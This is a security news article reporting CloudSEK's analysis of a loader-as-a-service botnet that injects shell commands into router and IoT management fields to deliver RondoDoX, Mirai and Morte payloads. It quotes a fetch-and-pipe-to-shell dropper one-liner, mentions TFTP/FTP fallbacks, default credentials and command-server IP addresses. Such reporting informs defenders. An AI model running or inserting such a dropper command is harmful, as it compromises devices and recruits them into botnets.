HomeSecurityNew Loader-as-a-Service Botnet Targets Routers and IoT Devices

New Loader-as-a-Service Botnet Targets Routers and IoT Devices

A sophisticated botnet has emerged, using a Loader-as-a-Service model to infect and recruit internet-connected devices (worldwide).

Botnet Loader-as-a-Service

The campaign exploits SOHO routers, IoT devices , and enterprise applications through command injection vulnerabilities in web interfaces, showing a worrying evolution in cybercriminal tactics.

The malicious infrastructure operates by targeting unsanitized POST parameters to network management fields, including NTP settings, syslog, and hostname. Attackers inject shell commands into these vulnerable input fields, allowing remote execution via minimal one-line droppers, such as wget -qO- https://IP/rondo.*.sh | sh.

This approach maximizes success rates across various device architectures while maintaining operational stealth.

The botnet systematically progresses through multiple attack phases, starting with automated authentication tests, using default credentials such as admin:admin combinations.

After successful access, the operation deploys fetch-and-execute chains that download RondoDoX, Mirai, and Morte payloads from a distributed command infrastructure spanning multiple IP addresses, including 74.194.191.52, 83.252.42.112, and 196.251.73.24.

See also: Akira ransomware compromises MFA-protected SonicWall VPN accounts

CloudSEK analysts identified this campaign through exposed command and control logs spanning six months of operation. The company’s TRIAD platform uncovered logger panels containing detailed attack paths and infrastructure deployment patterns , providing unprecedented visibility into the botnet’s operational methodology.

New Loader-as-a-Service Botnet Targets Routers and IoT Devices

The malware shows remarkable adaptability through multi-architecture payload support , leveraging BusyBox capabilities for cross-platform compatibility. The exploit targets servers Oracle WebLogic , embedded Linux systems , and specific router management interfaces, including the wlwps.htm and wan_dyna.html pages.

Additionally, the campaign exploits known CVEs such as CVE-2019-17574 (WordPress Popup Maker), CVE-2019-16759 (vBulletin pre-auth RCE), and CVE-2012-1823 (PHP-CGI query string handling). The botnet's primary penetration method focuses on exploiting web GUI fields through sophisticated command injection techniques.

Command Injection Attack Mechanism

The botnet's main infiltration method focuses on exploiting web GUI fields through sophisticated command injection techniques.

The malicious enterprise targets network configuration parameters, where administrators typically input server addresses and system settings. When devices process these malformed inputs without proper sanitization, the embedded commands are executed with system privileges.

The attack chain uses multiple fallback protocols to ensure successful payload delivery. If HTTP-based wget commands fail, the system automatically attempts TFTP and FTP transfers using commands such as ftpget and tftp.

See also: Sophisticated malware campaign targets WordPress websites

Selecting the team

🔒 Protect your privacy with Proton VPN

Swiss VPN from the creators of Proton Mail — strict no-logs policy, strong encryption, and built-in NetShield that blocks ads, trackers, & malware.

  • ✔ No-logs, based in Switzerland (except 14-Eyes)
  • ✔ NetShield: blocks ads, trackers & malicious domains
  • ✔ Covers all devices — free version available
Try Proton VPN for free — 30-day money-back guarantee →

The link is an affiliate link — SecNews may receive a commission at no additional cost to you. It does not affect the independence of our article writing.

This method, combined with hosting identical payloads on multiple IP addresses, creates a resilient distribution network that survives individual server crashes.

After the attack, the botnet conducts extensive device fingerprinting  via ReplyDeviceInfo modules , collecting MAC addresses, hostnames , firmware versions, and available services. This identification determines which binaries (to be deployed based on the architecture) and whether the devices should be retained for cryptocurrency mining, DDoS participation, or sale as access credentials to other malicious actors.

New Loader-as-a-Service Botnet Targets Routers and IoT Devices

Botnet protection

To protect against this threat, it is important to software and operating system your device's. Botnet attacks often exploit known vulnerabilities.

It is also essential to use a reliable security program that provides protection against malware and botnets. This should include performing regular scans to detect and remove any attacks.

See also: North Korean hackers use new AkdoorTea backdoor

Using strong passwords and changing them regularly is another way to protect yourself from Botnets. Botnet attacks often try to guess passwords, so using strong passwords and changing them regularly can help protect your accounts.

Finally, information security training can be particularly useful. Understanding how botnet attacks work can help you identify and avoid attacks.

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

Digital Fortress
Digital Fortresshttps://www.secnews.gr
Pursue Your Dreams & Live!

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS